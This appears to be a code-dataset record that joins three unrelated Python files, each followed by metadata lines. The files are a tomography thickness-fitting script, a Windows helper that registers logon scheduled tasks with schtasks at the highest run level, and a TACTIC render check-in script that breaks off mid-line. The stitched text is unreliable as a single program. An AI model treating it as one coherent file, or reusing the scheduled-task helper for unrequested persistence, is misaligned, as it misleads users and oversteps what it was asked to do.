parser.add_argument("--y0", type=str, default=0, help="for test on some regions, multiple regions are allowed, --y0 100,200,300") parser.add_argument("--adaptiveBox", action="store_true", default=False, help="squeeze the x side of boxsize by cos(theta(tlt))") parser.add_argument("--writeClippedRegions", action="store_true", default=False, help="write out the clipped region of interest, test only") #try to determine I0 from the intercept of the graph #parser.add_argument("--I0", type=float, default=2000, help="whole spectrum I0") parser.add_argument("--d0", type=float, default=100, help="initial thickness") parser.add_argument("--theta0", type=float, default=0, help="offset of angle theta (the initial offset angle around y-axis)") parser.add_argument("--alpha0", type=float, default=0, help="offset of angle alpha (the initial offset angle around x-axis)") #assume A == 1 parser.add_argument("--A", type=float, default=1, help="scaling factor of I0") parser.add_argument("--B", type=float, default=0, help="# of electrons = gain * pixel_value + B") parser.add_argument("--MFP", type=float, default=350, help="mean free path, for vitreous ice, 350nm@300kV, 300nm@200kV") #parser.add_argument("--k", type=float, default=0, help="I0(theta) = I0/(cos(theta)**k), and 0=<k<=1") parser.add_argument("--addOffset", type=str, default='-32000', help="Add options.addOffset to pixel values") #parser.add_argument("--inversePixel", action="store_true", default=False, help="inverse pixel values") parser.add_argument("--plotData", action="store_true", default=False, help="plot the original data, including curvilinear mode and linear mode") parser.add_argument("--plotResults", action="store_true", default=False, help="plot the original data and fitted results, including curvilinear mode and linear mode") parser.add_argument("--mode", type=int, default=0, help="") parser.add_argument("--niter", type=int, default=200, help="niter in basinhopping") parser.add_argument("--interval", type=int, default=50, help="interval in basinhopping") parser.add_argument("--T", type=float, default=1e-4, help="T in basinhopping") parser.add_argument("--modifyTiltFile", action="store_true", default=False, help="modify the .tlt file by returned theta0") parser.add_argument('--modifiedTiltName',type=str,default='',help='the filename of modified tilt angles') #parser.add_argument("--refineRegion", action="store_true", default=False, help="use returned theta0 to re-clip region and re-do optimization") parser.add_argument('--logName',type=str,default='',help='the name of the log file which contains the output') parser.add_argument("--verbose", "-v", dest="verbose", action="store", metavar="n", type=int, default=0, help="verbose level, higner number means higher level of verboseness") parser.add_argument("--ppid", type=int, help="Set the PID of the parent process, used for cross platform PPID",default=-1) global options (options, args) = parser.parse_args() logger = E2init(sys.argv, options.ppid) serieshdr = EMData(options.tiltseries,0,True) global nslices nslices = serieshdr['nz'] nx = serieshdr['nx'] ny = serieshdr['ny'] print "\ntiltseries %s: %d*%d*%d"%(options.tiltseries, nx, ny, nslices) #read in tilt angles file, *.tlt anglesfile = open(options.tiltangles,'r') #Open tilt angles file alines = anglesfile.readlines() #Read its lines anglesfile.close() #Close the file #global tiltangles tiltangles = [ alines[i].replace('\n','') for i in range(len(alines)) ] #Eliminate trailing return character, '\n', for each line in the tiltangles file ntiltangles = len(tiltangles) tiltanglesArray = np.array(tiltangles) if (options.verbose>=10): print tiltangles blocks = [] boxsize = options.boxsize if (options.x0 and options.y0): x0 = [int(x) for x in options.x0.split(',')] y0 = [int(y) for y in options.y0.split(',')] else: print "Please provide the X/Y coordinates of selected regions using --x0 --y0\n" sys.exit(0) origDictionary = collections.OrderedDict() for k in range(nslices): angle = float(tiltangles[k]) r0 = Region(0, 0, k, nx, ny, 1) tiltedImg = EMData(options.tiltseries, 0, 0, r0) blockMeanList = [] for i in range(len(x0)): testname = options.tiltseries.split('.')[0]+'_x0%g_y0%g_clip.hdf'%(x0[i], y0[i]) xp = (x0[i] - nx/2.0) * math.cos(math.radians(angle)) + nx/2.0 yp = y0[i] if (options.adaptiveBox): boxsizeX = int(boxsize * math.cos(math.radians(angle))) else: boxsizeX = boxsize #extract the whole image at each tilt xp = xp-boxsizeX/2 yp = yp-boxsize/2 r = Region(xp, yp, boxsizeX, boxsize) img = tiltedImg.get_clip(r) if (options.writeClippedRegions): img.write_image(testname, k) blockMeanValues = blockMean(img, boxsizeX, boxsize) blockMeanList.append(blockMeanValues) origDictionary[tiltangles[k]] = flattenList(blockMeanList) #if (options.verbose>=10): print origDictionary assert(len(origDictionary)==len(tiltangles)) startZ = 0 endZ = nslices stepZ = 1 dictionary0 = collections.OrderedDict() n=0 for key, value in origDictionary.items()[startZ:endZ]: if (math.fmod(n, stepZ) == 0): dictionary0[key] = value n+=1 #print "len(dictionary)=", len(dictionary0) #check if the tilt angles are from negative to positive, if not, reverse the order of dictionary if (float(tiltangles[0]) > 0): print "Reversing the order of tilt angles since we usually start from negative tilts to positive tilts" items = dictionary0.items() items.reverse() dictionary0 = collections.OrderedDict(items) if (options.verbose>=10): print dictionary0 if (options.plotData): plotOriginalData(dictionary0, options) global dictionary #dictionary = averageRescaledResultDict(rescaledResultDict, options) dictionary = dictionary0 #use intercept as the initial value of I0 and set gain (A) == 1 thetaCurve, IntensityCurve, thetaLinear, IntensityLinear = generateData2(dictionary, options) oneResultDict = fitLinearRegression3(thetaLinear, IntensityLinear, tiltanglesArray, thetaCurve, IntensityCurve, options) I0 = calculateIntercept(oneResultDict, options) print "initial I0 =", I0 #options.I0 = I0 global maxVal, minVal maxKey, maxVal = max(dictionary.iteritems(), key=lambda x:x[1]) maxVal = maxVal[0] minKey, minVal = min(dictionary.iteritems(), key=lambda x:x[1]) minVal = minVal[0] print "max: max average pixel value = %g @ tilt angles =%s"%(maxVal, maxKey) print "min: min average pixel value = %g @ tilt angles =%s"%(minVal, minKey) if (options.mode == 0): #use complete model, use multiple regions print "Using complete model and %g boxes!"%len(x0) #I0 = options.I0 d0 = options.d0 theta0 = options.theta0 alpha0 = options.alpha0 A = options.A B = options.B MFP = options.MFP niter = options.niter interval = options.interval p0 = [I0, d0, theta0, alpha0, A, B, MFP] #p0 = [I0, d0, theta0, alpha0, B, MFP] x0 = p0 boundsList = [(maxVal, None),(10, 250), (-10, 10), (-10, 10), (0.01, None), (None, int(minVal)), (1, None)] #boundsList = [(maxVal, None),(10, 250), (-10, 10), (-10, 10), (None, int(minVal)), (1, None)] minimizer_kwargs = dict(method="L-BFGS-B", bounds=boundsList) mybounds = MyBounds() mybounds.xmax=[float('inf'), 250.0, 10.0, 10.0, float('inf'), int(minVal), float('inf')] mybounds.xmin=[maxVal, 10.0, -10.0, -10.0, 0.01, (-1)*(float('inf')), 1.0] #mybounds.xmax=[float('inf'), 250.0, 10.0, 10.0, int(minVal), float('inf')] #mybounds.xmin=[maxVal, 10.0, -10.0, -10.0, (-1)*(float('inf')), 1.0] mytakestep = MyTakeStep3() res = scipy.optimize.basinhopping(optimizationFuncFullModel0, x0, T=options.T, stepsize=0.01, minimizer_kwargs=minimizer_kwargs, niter=niter, take_step=mytakestep, accept_test=mybounds, \ callback=None, interval=interval, disp=False, niter_success=None) #print res tmp = res.x.tolist() #tmp[1] = tmp[1]+100 I0, d0, theta0, alpha0, A, B, MFP = tmp[0], tmp[1], tmp[2], tmp[3], tmp[4], tmp[5], tmp[6] #I0, d0, theta0, alpha0, B, MFP = tmp[0], tmp[1], tmp[2], tmp[3], tmp[4], tmp[5] gamma0 = calculateGamma0(theta0, alpha0) print "[I0, d0, theta0, alpha0, A, B, MFP, gamma0] =", I0, d0, theta0, alpha0, A, B, MFP, gamma0 print "B/I0 = ", B/I0 print "***************************************************" print "Tilt series: %s"%options.tiltseries print "Fitting results:" print "Thickness = %g nm"%d0 print "Sample tilt: theta0 = %g degree, alpha0 = %g degree, gamma0 = %g degree"%(theta0, alpha0, gamma0) print "Mean free path = %g nm"%MFP if (options.logName): logName = options.logName else: logName = options.tiltseries.split(".")[0] + ".log" fp = open(logName, 'w') fp.write("Tilt series: %s\n"%options.tiltseries) fp.write("Fitting results:\n") fp.write("Thickness = %g nm\n"%d0) fp.write("Sample tilt: theta0 = %g degree, alpha0 = %g degree, gamma0 = %g degree\n"%(theta0, alpha0, gamma0)) fp.write("Mean free path = %g nm\n"%MFP) fp.close() if (options.plotResults): compareFitData(dictionary, tmp, options) if (options.modifyTiltFile): if (options.modifiedTiltName): tiltFile = options.modifiedTiltName else: tiltFile = options.tiltseries.split(".")[0] + "_modified.tlt" fp = open(tiltFile, 'w') for i in tiltangles: tlt = float(i) + theta0 #print float(tlt) line = "%g\n"%(tlt) fp.write(line) fp.close() def calculateIntercept(oneResultDict, options): interceptLeftArray = np.array([]) interceptRightArray = np.array([]) for boxPosition, value in oneResultDict.iteritems(): interceptLeftArray = np.append(interceptLeftArray, value['interceptLeft']) interceptRightArray = np.append(interceptRightArray, value['interceptRight']) interceptArray = np.append(interceptLeftArray, interceptRightArray) interceptMedian = np.median(interceptArray) #print interceptArray initialI0 = exp(interceptMedian) return initialI0 def fitLinearRegression3(thetaLinear, IntensityLinear, tiltanglesArray, thetaCurve, IntensityCurve, options): x0 = [int(x) for x in options.x0.split(',')] y0 = [int(y) for y in options.y0.split(',')] resultDict = collections.OrderedDict() #returnDict = collections.OrderedDict() allResLeft = [] allResRight = [] for i in range(len(x0)): iIntensityLinear = IntensityLinear[:, i] iIntensityCurve = IntensityCurve[:, i] key = '%g %g'%(x0[i], y0[i]) #print "x0, y0 =", key ret = fitOneLinearRegression(thetaLinear, iIntensityLinear, tiltanglesArray, options) fres, stdRes, xLeft, yLeft, fitLeft, xRight, yRight, fitRight, indexLargeLeft, indexLargeRight, indexSmallLeft, indexSmallRight, resLeft, resRight, slopeLeft, interceptLeft, slopeRight, interceptRight = ret resultDict[key] = {} resultDict[key]['SSE'] = fres resultDict[key]['intensityCurve'] = iIntensityCurve resultDict[key]['tiltAngles'] = thetaCurve resultDict[key]['stdRes'] = stdRes resultDict[key]['xLeft'] = xLeft resultDict[key]['yLeft'] = yLeft resultDict[key]['fitLeft'] = fitLeft resultDict[key]['xRight'] = xRight resultDict[key]['yRight'] = yRight resultDict[key]['fitRight'] = fitRight resultDict[key]['indexLargeLeft'] = indexLargeLeft resultDict[key]['indexLargeRight'] = indexLargeRight resultDict[key]['indexSmallLeft'] = indexSmallLeft resultDict[key]['indexSmallRight'] = indexSmallRight resultDict[key]['resLeft'] = resLeft resultDict[key]['resRight'] = resRight resultDict[key]['slopeLeft'] = slopeLeft resultDict[key]['interceptLeft'] = interceptLeft resultDict[key]['slopeRight'] = slopeRight resultDict[key]['interceptRight'] = interceptRight return resultDict def fitOneLinearRegression(thetaLinear, IntensityLinear, tiltanglesArray, options): if (len(tiltanglesArray)%2 == 1): halfN = int(len(tiltanglesArray)/2) + 1 xLeft, yLeft = thetaLinear[0:halfN], IntensityLinear[0:halfN] xRight, yRight = thetaLinear[halfN-1:], IntensityLinear[halfN-1:] else: halfN = int(len(tiltanglesArray)/2) xLeft, yLeft = thetaLinear[0:halfN], IntensityLinear[0:halfN] xRight, yRight = thetaLinear[halfN:], IntensityLinear[halfN:] slopeLeft, interceptLeft, r2Left = linearRegression(xLeft, yLeft) slopeRight, interceptRight, r2Right = linearRegression(xRight, yRight) assert(len(xLeft)==len(xRight)) fitLeft = slopeLeft*xLeft + interceptLeft fitRight = slopeRight*xRight + interceptRight #the sum of squared residuals resLeft = yLeft - fitLeft resLeft = resLeft / fitLeft #print "resLeft", resLeft resRight = yRight - fitRight resRight = resRight / fitRight #print "resRight", resRight fresLeft = sum(resLeft**2) fresRight = sum(resRight**2) fres = [fresLeft*1000000, fresRight*1000000] #find the points with the largest 3 residuals in left and right branches, use numpy.argpartition #N = options.largestNRes N=3 negN = (-1)*N indexLargeLeft = np.argpartition(resLeft**2, negN)[negN:] indexLargeRight = np.argpartition(resRight**2, negN)[negN:] M=3 #M = options.smallestNRes posM = M indexSmallLeft = np.argpartition(resLeft**2, posM)[:posM] indexSmallRight = np.argpartition(resRight**2, posM)[:posM] #MSE, under the assumption that the population error term has a constant variance, the estimate of that variance is given by MSE, mean square error #The denominator is the sample size reduced by the number of model parameters estimated from the same data, (n-p) for p regressors or (n-p-1) if an intercept is used. #In this case, p=1 so the denominator is n-2. stdResLeft = np.std(resLeft, ddof=2) stdResRight = np.std(resRight, ddof=2) stdRes = [stdResLeft*1000, stdResRight*1000] ret = fres, stdRes, xLeft, yLeft, fitLeft, xRight, yRight, fitRight, indexLargeLeft, indexLargeRight, indexSmallLeft, indexSmallRight, resLeft, resRight, slopeLeft, interceptLeft, slopeRight, interceptRight return ret def linearRegression(x, y): slope, intercept, r_value, p_value, std_err = stats.linregress(x,y) # To get slope, intercept and coefficient of determination (r_squared) return slope, intercept, r_value**2 def generateData2(dictionary, options): x0 = [int(x) for x in options.x0.split(',')] thetaLst = [] intensityLst = [] thetaLinearLst = [] for theta, intensity in dictionary.iteritems(): thetaLst.append(float(theta)) intensityLst.append(intensity) cosAngle = math.cos((float(theta)/360.)*math.pi*2) tmp = (1./(cosAngle)) thetaLinearLst.append(tmp) thetaArray = np.asarray(thetaLst) thetaLinearArray = np.asarray(thetaLinearLst) intensityArray = np.asarray(intensityLst) intensityLinearArray = np.log(intensityArray) return thetaArray, intensityArray, thetaLinearArray, intensityLinearArray def plotOriginalData(dictionary, options): #plot the curve mode and log-ratio mode of original data thetaLst = [] xlinearLst=[] intensityLst = [] for theta, intensity in dictionary.iteritems(): thetaLst.append(float(theta)) intensityLst.append(intensity) cosAngle = math.cos((float(theta)/360.)*math.pi*2) x = (1./(cosAngle)) xlinearLst.append(x) xdata = np.asarray(thetaLst) ydata = np.asarray(intensityLst) ydataInv = ydata[::-1] #print xdata, ydata x0 = [int(x) for x in options.x0.split(',')] y0 = [int(x) for x in options.y0.split(',')] colors = ['b', 'r', 'g', 'c', 'm', 'y', 'k', 'b', 'r', 'g', 'c', 'm', 'y', 'k'] markers = ['s', 'o', '^', 'v', 'x', '*', '+', 'd', 'D', '<', '>', 'p', '8', 'H'] plt.figure(figsize=(12.5, 10)) #plt.subplot(221) for i in range(len(x0)): boxPosition = '%g,%g'%(x0[i], y0[i]) if (i<len(colors)): plt.plot(xdata, ydata[:, i], markers[i], label = boxPosition, markersize=5, color = colors[i]) else: i = i-len(colors) plt.plot(xdata, ydata[:, i], markers[i], label = boxPosition, markersize=5, color = colors[i]) plt.axvline(0, linestyle='--', color='k', linewidth=2.0) plt.xticks(fontsize = 20) plt.yticks(fontsize = 20) plt.legend(fontsize = 18) ax = plt.gca() ax.tick_params(pad = 10) plt.xlabel(r'$\theta$ ($^\circ$)', fontsize = 24, labelpad = 10) plt.ylabel('Intensity', fontsize = 24, labelpad = 10) #plt.xlim(-70, 70) plt.grid(True, linestyle = '--', alpha = 0.5) #plot the linear format (log-ratio mode) of original data xlinear = np.asarray(xlinearLst) ylinear = np.log(ydata) plt.figure(figsize=(12.5, 10)) #plt.subplot(222) for i in range(len(x0)): boxPosition = '%g,%g'%(x0[i], y0[i]) if (i<len(colors)): plt.plot(xlinear, ylinear[:, i], markers[i], label = boxPosition, markersize=5, color = colors[i]) else: i = i-len(colors) plt.plot(xlinear, ylinear[:, i], markers[i], label = boxPosition, markersize=5, color = colors[i]) plt.xticks(fontsize = 20) plt.yticks(fontsize = 20) plt.legend(fontsize = 18) ax = plt.gca() ax.tick_params(pad = 10) plt.xlabel(r'1/cos($\theta$)', fontsize = 24, labelpad = 10) plt.ylabel('ln(Intensity)', fontsize = 24, labelpad = 10) plt.grid(True, linestyle = '--', alpha = 0.5) plt.show() def compareFitData(dictionary, tmp, options): thetaLst = [] xlinearLst=[] intensityLst = [] for theta, intensity in dictionary.iteritems(): thetaLst.append(float(theta)) intensityLst.append(intensity) cosAngle = math.cos((float(theta)/360.)*math.pi*2) x = (1./(cosAngle)) xlinearLst.append(x) xdata = np.asarray(thetaLst) ydata = np.asarray(intensityLst) ydataInv = ydata[::-1] #print xdata, ydata x0 = [int(x) for x in options.x0.split(',')] y0 = [int(x) for x in options.y0.split(',')] colors = ['b', 'r', 'g', 'c', 'm', 'y', 'k', 'b', 'r', 'g', 'c', 'm', 'y', 'k'] markers = ['s', 'o', '^', 'v', 'x', '*', '+', 'd', 'D', '<', '>', 'p', '8', 'H'] plt.figure(figsize=(25, 20)) plt.subplots_adjust(left=None, bottom=None, right=None, top=None, wspace=0.4, hspace=0.4) #plot the curvilinear format of original data plt.subplot(221) for i in range(len(x0)): boxPosition = '%g,%g'%(x0[i], y0[i]) if (i<len(colors)): plt.plot(xdata, ydata[:, i], markers[i], label = boxPosition, markersize=5, color = colors[i]) else: i = i-len(colors) plt.plot(xdata, ydata[:, i], markers[i], label = boxPosition, markersize=5, color = colors[i]) plt.axvline(0, linestyle='--', color='k', linewidth=2.0) plt.xticks(fontsize = 20) plt.yticks(fontsize = 20) plt.legend(fontsize = 18) ax = plt.gca() ax.tick_params(pad = 10) plt.xlabel(r'$\theta$ ($^\circ$)', fontsize = 24, labelpad = 10) plt.ylabel('Intensity', fontsize = 24, labelpad = 10) plt.title('Original: %s'%options.tiltseries) #plt.xlim(-70, 70) plt.grid(True, linestyle = '--', alpha = 0.5) #plot the linear format (log-ratio mode) of original data xlinear = np.asarray(xlinearLst) ylinear = np.log(ydata) #plt.figure(figsize=(12.5, 10)) plt.subplot(222) for i in range(len(x0)): boxPosition = '%g,%g'%(x0[i], y0[i]) if (i<len(colors)): plt.plot(xlinear, ylinear[:, i], markers[i], label = boxPosition, markersize=5, color = colors[i]) else: i = i-len(colors) plt.plot(xlinear, ylinear[:, i], markers[i], label = boxPosition, markersize=5, color = colors[i]) plt.xticks(fontsize = 20) plt.yticks(fontsize = 20) plt.legend(fontsize = 18) ax = plt.gca() ax.tick_params(pad = 10) plt.xlabel(r'1/cos($\theta$)', fontsize = 24, labelpad = 10) plt.ylabel('ln(Intensity)', fontsize = 24, labelpad = 10) plt.title('Original: %s'%options.tiltseries) plt.grid(True, linestyle = '--', alpha = 0.5) I0, d0, theta0, alpha0, A, B, MFP = tmp x0 = [int(x) for x in options.x0.split(',')] y0 = [int(x) for x in options.y0.split(',')] xfit = [] yfit = [] xdata = [] xModified=[] ydata = [] ydataLinear = [] I0Lst = [] for theta, intensity in dictionary.iteritems(): for i in range(len(intensity)): theta_i = float(theta) + theta0 xModified.append(theta_i) #angle.append(theta_i) cosAngle = math.cos((float(theta)/360.)*math.pi*2) cosTheta = math.cos((theta_i/360.)*math.pi*2) cosAlpha = math.cos((alpha0/360.)*math.pi*2) intensityIn = math.log(I0) y = intensityIn - (1./(MFP * cosTheta * cosAlpha)) * d0 yfit.append(y) #print intensity ########which one is used as ydata in corrected plots y2 = math.log(intensity[i]) #y2 = math.log(A * (intensity[i] - B)) ydataLinear.append(y2) ydata.append(intensity[i]) #x = (-1) * (1./(MFP * cosTheta * cosAlpha)) x = (1./(cosTheta)) xfit.append(x) #x2 = (-1) * (1./(MFP * cosAngle)) x2 = (1./(cosAngle)) xdata.append(x2) colors = ['b', 'r', 'g', 'c', 'm', 'y', 'k', 'b', 'r', 'g', 'c', 'm', 'y', 'k'] markers = ['s', 'o', '^', 'v', 'x', '*', '+', 'd', 'D', '<', '>', 'p', '8', 'H'] #plot the linear format (log-ratio mode) of fitted data after determination of parameters xfit = np.asarray(xfit) xfit2 = np.reshape(xfit, (nslices, len(x0))) yfit = np.asarray(yfit) yfit2 = np.reshape(yfit, (nslices, len(x0))) xdata = np.asarray(xdata) xdata2 = np.reshape(xdata, (nslices, len(x0))) ydataLinear = np.asarray(ydataLinear) ydataLinear2 = np.reshape(ydataLinear, (nslices, len(x0))) residuals = ydataLinear - yfit fres = sum(residuals**2) text_str = 'I0=%g\nd0=%g\ntheta0=%g\nalpha0=%g\ngain=%g\nB=%g\nMFP=%g\nres=%g'%(tmp[0], tmp[1], tmp[2], tmp[3], tmp[4], tmp[5], tmp[6], fres) plt.subplot(224) #plt.figure(figsize=(12.5, 10)) for i in range(len(x0)): boxPosition = '%g,%g'%(x0[i], y0[i]) plt.plot(xfit2[:, i], ydataLinear2[:, i], markers[i], label = boxPosition, markersize=5, color = colors[i]) plt.xticks(fontsize = 20) plt.yticks(fontsize = 20) plt.legend(fontsize = 18) ax = plt.gca() ax.tick_params(pad = 10) #plt.plot(xfit, ydata, 'g^') plt.title('Least-squares fitting: %s'%options.tiltseries) plt.xlabel(r'1/cos($\theta$+$\theta_0$)', fontsize = 24, labelpad = 10) plt.ylabel('ln(Intensity)', fontsize = 24, labelpad = 10) plt.grid(True, linestyle = '--', alpha = 0.5) #plt.show() #plot the curvilinear format of fitted data after determination of parameters #xdata, xModified, ydata, yfit = fitDataCurve(dictionary, tmp) xdata = np.asarray(xdata) xdata2 = np.reshape(xdata, (nslices, len(x0))) xModified = np.asarray(xModified) xModified2 = np.reshape(xModified, (nslices, len(x0))) ydata = np.asarray(ydata) ydata2 = np.reshape(ydata, (nslices, len(x0))) ydata2Inv = ydata2[::-1] yfit = np.asarray(yfit) yfit2 = np.reshape(yfit, (nslices, len(x0))) residuals = ydata - yfit fres = sum(residuals**2) text_str = 'I0=%g\nd0=%g\ntheta0=%g\nalpha0=%g\ngain=%g\nB=%g\nMFP=%g\nres=%g'%(tmp[0], tmp[1], tmp[2], tmp[3], tmp[4], tmp[5], tmp[6], fres) #plt.plot(xModified2, yfit2, 'r--', linewidth=2.0) #plt.figure(figsize=(12.5, 10)) plt.subplot(223) for i in range(len(x0)): boxPosition = '%g,%g'%(x0[i], y0[i]) plt.plot(xModified2[:, i], ydata2[:, i], markers[i], label = boxPosition, markersize=5, color = colors[i]) plt.axvline(0, linestyle='--', color='k', linewidth=2.0) plt.xticks(fontsize = 20) plt.yticks(fontsize = 20) plt.legend(fontsize = 18) ax = plt.gca() ax.tick_params(pad = 10) plt.title('Least-squares fitting: %s'%options.tiltseries) plt.xlabel(r'$\theta$+$\theta_0$ ($^\circ$)', fontsize = 24, labelpad = 10) plt.ylabel('Intensity', fontsize = 24, labelpad = 10) #plt.xlim(-70, 70) plt.grid(True, linestyle = '--', alpha = 0.5) pdfName = options.tiltseries.split('.')[0]+'_results.pdf' print pdfName with PdfPages(pdfName) as pdf: pdf.savefig() plt.close() #plt.show() def calculateGamma0(theta0, alpha0): cosTheta0 = math.cos((theta0/360.)*math.pi*2) cosAlpha0 = math.cos((alpha0/360.)*math.pi*2) tanTheta0 = math.tan((theta0/360.)*math.pi*2) tanAlpha0 = math.tan((alpha0/360.)*math.pi*2) #tmp = 1./(cosTheta0 * cosTheta0 * cosAlpha0 * cosAlpha0) - tanTheta0 * tanTheta0 * tanAlpha0 * tanAlpha0 tmp = tanTheta0 * tanTheta0 + tanAlpha0 * tanAlpha0 + 1 cosGamma0 = math.pow(tmp, -0.5) gamma0 = math.acos(cosGamma0)*360./(math.pi*2) return gamma0 def optimizationFuncFullModel0(x): # use complete model I0, d0, theta0, alpha0, A, B, MFP = x #I0, d0, theta0, alpha0, B, MFP = x #A = 1 cosTheta0 = math.cos((theta0/360.)*math.pi*2) cosAlpha0 = math.cos((alpha0/360.)*math.pi*2) tanTheta0 = math.tan((theta0/360.)*math.pi*2) tanAlpha0 = math.tan((alpha0/360.)*math.pi*2) #tmp = 1./(cosTheta0 * cosTheta0 * cosAlpha0 * cosAlpha0) - tanTheta0 * tanTheta0 * tanAlpha0 * tanAlpha0 tmp = tanTheta0 * tanTheta0 + tanAlpha0 * tanAlpha0 + 1 cosGamma0 = math.pow(tmp, -0.5) func = 0 n = 0 for theta, intensity in dictionary.iteritems(): for i in range(len(intensity)): A = math.fabs(A) I0 = math.fabs(I0) intensityExit = math.log(A * (intensity[i] - B)) intensityIn = math.log(I0) theta_i = float(theta) + theta0 cosTheta = math.cos((theta_i/360.)*math.pi*2) #cosAlpha = math.cos((alpha0/360.)*math.pi*2) #err = intensityIn - (1./(MFP * cosTheta * cosAlpha)) * d0 - intensityExit err = intensityIn - (1./(MFP * cosTheta * cosGamma0)) * d0 * cosTheta0 - intensityExit func += err * err n+=1 func = func/n return func class MyBounds(object): def __init__(self, xmax = [], xmin = []): self.xmax = np.array(xmax) self.xmin = np.array(xmin) def __call__(self, **kwargs): x = kwargs["x_new"] tmax = bool(np.all(x <= self.xmax)) tmin = bool(np.all(x >= self.xmin)) return tmax and tmin class MyTakeStep3(object): def __init__(self, stepsize=0.01): self.stepsize = stepsize def __call__(self, x): s = self.stepsize #p0 = [I0, d0, theta0, alpha0, A, B, MFP] x = np.float64(x) x[0] += np.random.uniform(-1000.*s, 1000.*s) x[1] += np.random.uniform(-10.*s, 10.*s) x[2] += np.random.uniform(-s, s) x[3] += np.random.uniform(-s, s) x[4] += np.random.uniform(-10.*s, 10.*s) x[5] += np.random.uniform(-100.*s, 100.*s) x[6] += np.random.uniform(-10.*s, 10.*s) return x def flattenList(nestedLst): flattenLst = list(chain.from_iterable(nestedLst)) return flattenLst def blockMean(img, boxsizeX, boxsize): nx, ny = img.get_xsize(), img.get_ysize() nxBlock = int(nx/boxsizeX) nyBlock = int(ny/boxsize) #print nxBlock, nyBlock blockMeanValues = [] for i in range(nxBlock): x0 = i*boxsizeX for j in range(nyBlock): y0 = j*boxsize r = Region(x0, y0, boxsizeX, boxsize) blkImg = img.get_clip(r) blockMeanValue = oneBlockMean(blkImg) blockMeanValues.append(blockMeanValue) return blockMeanValues def oneBlockMean(img): nx, ny = img.get_xsize(), img.get_ysize() ary=EMNumPy.em2numpy(img) ary = reject_outliers(ary, m = 3) blkMean = np.mean(ary) blkSigma = np.std(ary) if (blkMean < 0): blkMean = blkMean * (-1) #average pixel values must be positive if (blkMean > 30000): offset = float(options.addOffset) blkMean = blkMean + offset return blkMean def reject_outliers(data, m=2): return data[abs(data - np.mean(data)) < m * np.std(data)] if __name__ == "__main__": main()
gpl-2.0
-8,677,815,489,985,896,000
40.003778
266
0.6252
false
3.118391
false
false
false
masamitsu-murase/pausable_unittest
pausable_unittest/utils/winutils.py
1
1893
# coding: utf-8 import subprocess import tempfile import os def register_schtasks(task_name, path, user, password=None, admin=True): command = ["schtasks.exe", "/Create", "/RU", user] if password: command += ["/RP", password] command += [ "/SC", "ONLOGON", "/TN", task_name, "/TR", '"' + path + '"', "/F" ] if admin: command += ["/RL", "HIGHEST"] else: command += ["/RL", "LIMITED"] subprocess.check_output(command, stderr=subprocess.STDOUT) command = ["schtasks.exe", "/Query", "/TN", task_name, "/XML", "ONE"] xml = subprocess.check_output(command, stderr=subprocess.STDOUT, universal_newlines=True) xml = xml.replace( "<DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>", "<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>") xml = xml.replace( "<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>", "<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>") with tempfile.NamedTemporaryFile(delete=False, mode="w") as xml_file: xml_file.write(xml) xml_file.close() xml_filename = xml_file.name try: command = [ "schtasks.exe", "/Create", "/TN", task_name, "/F", "/XML", xml_filename ] if password: command += ["/RU", user, "/RP", password] subprocess.check_output(command, stderr=subprocess.STDOUT) finally: os.remove(xml_filename) def unregister_schtasks(task_name): command = ["schtasks.exe", "/Delete", "/TN", task_name, "/F"] try: subprocess.check_output(command, stderr=subprocess.STDOUT) except subprocess.CalledProcessError as e: if e.returncode not in (0, 1): raise
mit
-6,031,662,333,350,813,000
32.418182
73
0.570523
false
3.675728
false
false
false
listyque/TACTIC-Handler
thlib/side/client/examples/checkin_render_layer.py
1
4903
import sys, os, shutil, getopt from tactic_client_lib import TacticServerStub SEARCH_TYPE = "prod/render" def move_file(file_paths, new_dir): '''move file to the handoff dir''' new_file_paths = [] for file_path in file_paths: file_name = os.path.basename(file_path) new_file_path = '%s/%s' %(new_dir, file_name) shutil.move(file_path, new_file_path) ''' while not os.path.exists(new_file_path): sys.stdout.write('.') ''' new_file_paths.append(new_file_path) return new_file_paths def expand_paths( file_path, file_range ): '''expands the file paths, replacing # as specified in the file_range''' file_paths = [] # frame_by is not really used here yet frame_by = 1 if file_range.find("/") != -1: file_range, frame_by = file_range.split("/") frame_start, frame_end = file_range.split("-") frame_start = int(frame_start) frame_end = int(frame_end) frame_by = int(frame_by) # find out the number of #'s in the path padding = len( file_path[file_path.index('#'):file_path.rindex('#')] )+1 for i in range(frame_start, frame_end+1, frame_by): expanded = file_path.replace( '#'*padding, str(i).zfill(padding) ) file_paths.append(expanded) return file_paths def main(args, login=None): # USAGE: checkin_render_layer.py shot_code = args[0] layer_name = args[1] version = args[2] context = args[3] file_range = args[4] pattern = args[5] server = TacticServerStub(login) # do the actual work server.start("Checked in file group [%s] to shot [%s] layer [%s]" % (pattern, shot_code, layer_name)) try: # move the file dir = server.get_handoff_dir() paths = expand_paths(pattern, file_range) move_file(paths, dir) file_name = os.path.basename(pattern) new_pattern = '%s/%s' % (dir, file_name) print("Files moved to handoff dir.\n") # checkin the moved files filters = [] filters.append(('shot_code', shot_code)) filters.append(('name', layer_name)) results = server.query('prod/layer', filters) # take the first one if results: id = results[0].get('id') search_type = server.build_search_type('prod/layer') # find the layer snapshot filters = [] filters.append(('version', version)) filters.append(('search_type', search_type)) filters.append(('search_id', id)) #TODO : may need a context to search for the proper layer results = server.query('sthpw/snapshot', filters) snap_code = '' if results: snap_code = results[0].get('code') # find the render render = None filters = [] filters.append(('search_type', search_type)) filters.append(('search_id', id)) filters.append(('snapshot_code', snap_code)) results = server.query(SEARCH_TYPE, filters) if results: render = results[0] if not render: render_data = { 'search_type': search_type, 'search_id': id, 'snapshot_code': snap_code } render = server.insert("prod/render", render_data) ''' results = server.query(SEARCH_TYPE, filters) render_id = 0 if results: render_id = results[0].get('id') # find the render id search_key = server.build_search_key(SEARCH_TYPE, render_id, column='id') ''' file_type = 'main' # run group checkin server.group_checkin(render.get("__search_key__"), context=context, file_path=new_pattern, file_type=file_type, file_range=file_range) except: server.abort() raise else: server.finish() if __name__ == '__main__': executable = sys.argv[0] #args = sys.argv[1:] login = None try: opts, args = getopt.getopt(sys.argv[1:], "l:h", ["login=","help"]) except getopt.error as msg: print(msg) sys.exit(2) # process options for o, a in opts: if o in ("-l", "--login"): login = a if o in ("-h", "--help"): print("python checkin_render_layer.py <shot_code> <layer_name> <version> <context> <file_range> <file_pattern>") print("python 